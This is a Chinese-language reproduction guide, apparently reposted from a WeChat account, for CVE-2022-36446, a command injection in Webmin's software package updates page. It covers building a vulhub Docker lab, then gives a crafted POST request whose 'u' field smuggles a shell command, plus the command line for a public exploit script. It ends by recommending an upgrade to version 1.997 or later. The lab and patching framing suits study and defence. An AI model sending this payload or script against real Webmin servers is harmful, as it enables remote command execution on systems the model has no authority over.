可通过vulhub搭建漏洞环境
执行命令git clone https://github.com/vulhub/vulhub
将vulhub下载到本地
进入vulhub/webmin/CVE-2019-15107目录,CVE-2019-15107漏洞环境也可用作CVE-2022-36446
执行命令
docker-compose up -d启动漏洞环境
待漏洞环境启动后
执行
docker-compose ps查看漏洞环境映射端口
访问https://ip:10000,出现以下界面代表环境部署成功
接下来需进入漏洞环境容器修改webmin密码
执行命令
docker ps
查看漏洞环境容器id
执行命令
docker exec -it ccbc3fcb60b6 /bin/bash
进入docker容器内部
之后进入docker容器的/usr/share/webmin/目录下
执行命令
./changepass.pl /etc/webmin root root
将root密码设置为root
设置完成后即可以root/root登录https://ip:10000/
待环境搭建完成后,构造以下数据包
POST /package-updates/update.cgi HTTP/1.1
Host: 192.168.111.4:10000
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Referer: http://192.168.111.4:10000/package-updates/update.cgi?xnavigation=1
Cookie: sid=cf8d4ac639a655a0d37a1c9bd8698f85
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
mode=new&search=ssh&redir=&redirdesc=&u=0%3Bcmd%3B&confirm=Install%2BNow
即可进行漏洞利用
也可通过漏洞利用脚本https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE进行漏洞利用,将漏洞李永军脚本下载到本地后,执行命令
python CVE-2022-36446.py -t https://ip:10000/ -u root -p root -k -I
即可进行漏洞利用
可从官网https://webmin.com/下载版本大于等于1.997版本的Webmin。
原文始发于微信公众号(第59号):CVE-2022-36446 Webmin命令注入漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论